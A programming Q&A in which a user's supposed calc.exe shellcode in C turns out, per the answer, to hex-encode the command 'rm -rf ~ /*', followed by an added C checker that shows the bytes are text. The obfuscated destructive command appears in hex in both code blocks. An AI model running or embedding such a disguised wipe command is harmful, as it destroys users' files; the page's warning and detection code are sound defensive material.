
I have the following program written in C:

/* Byte string the program tries to run as machine code. */
char code[] =
    "\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20"
    "\x2F\x2A\x20\x32\x3e\x20\x2f\x64\x65"
    "\x76\x2f\x6e\x75\x6c\x6c\x20\x26";

int main(int argc, char **argv)
{
    int (*func)();
    /* Reinterpret the data array as a function and jump into it. */
    func = (int (*)()) code;
    (int)(*func)();
    return 0;
}

I compile it to .exe using shellnoob, but when I try to launch it in Windows 7 (32-bit), an empty cmd window pops up and nothing happens. Could anyone please give me a hand? (The shellcode should spawn calc.exe.)

1 Answer

This string decodes to rm -rf ~ /* 2> /dev/null &, a shell command which would silently delete all files in your home directory (and all files on your computer given root access) on a UNIX/Linux shell. It would not work on Windows because it uses a different language for the shell.

To execute a shell command from C, the system() function can be used: http://en.cppreference.com/w/c/program/system. On Windows it must use the cmd.exe shell language. system("calc") should launch calc.exe.

A "shellcode" in the sense of machine code instructions that should be executed can be called more or less like in this code, but the memory needs to be marked as executable first. (By default the OS does not allow executing data memory, for security reasons obviously.) On Windows executable memory can be allocated using VirtualAllocEx, for example. See "How to generate and run native code dynamically?".

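The answer's first observation, that the byte string is plain ASCII text rather than machine code, is something worth checking before ever jumping into an opaque buffer. The following is an added example, not code from the question or the answer: it takes the byte string from the question unchanged, classifies it as printable text, and renders it so the hidden command becomes visible. The contrasting native_stub array (three bytes that look like x86 code) is constructed here purely to show how a real instruction sequence fails the same check.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* The byte string from the question, copied unchanged. */
static const char code[] =
    "\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20"
    "\x2F\x2A\x20\x32\x3e\x20\x2f\x64\x65"
    "\x76\x2f\x6e\x75\x6c\x6c\x20\x26";

/* Constructed contrast case (assumption, not from the page): bytes that
 * resemble x86 "xor eax,eax; ret". Used only to show the classifier. */
static const unsigned char native_stub[] = { 0x31, 0xC0, 0xC3 };

/* Returns 1 if every byte is printable ASCII (tab/newline allowed), else 0.
 * A buffer that passes this test is text, not machine code. */
int is_printable_text(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        if (!isprint(buf[i]) && buf[i] != '\n' && buf[i] != '\t')
            return 0;
    }
    return 1;
}

/* Copies buf into out as a NUL-terminated string, replacing every
 * non-printable byte with '.', and returns the number of bytes rendered. */
size_t render_bytes(const unsigned char *buf, size_t len, char *out, size_t outsz)
{
    size_t n = 0;
    if (outsz == 0)
        return 0;
    for (; n < len && n + 1 < outsz; n++)
        out[n] = isprint(buf[n]) ? (char)buf[n] : '.';
    out[n] = '\0';
    return n;
}

int main(void)
{
    char shown[128];

    /* sizeof code - 1 drops the terminating NUL of the string literal. */
    render_bytes((const unsigned char *)code, sizeof code - 1, shown, sizeof shown);
    printf("question bytes: printable=%d -> \"%s\"\n",
           is_printable_text((const unsigned char *)code, sizeof code - 1), shown);

    render_bytes(native_stub, sizeof native_stub, shown, sizeof shown);
    printf("native stub:    printable=%d -> \"%s\"\n",
           is_printable_text(native_stub, sizeof native_stub), shown);
    return 0;
}
```

The first line of output shows the decoded rm -rf command the answer describes; the second shows that genuine machine code is immediately flagged as non-text. Running a check like this on any unknown payload, on the build machine rather than the target, is a cheap way to avoid executing something other than what you expected.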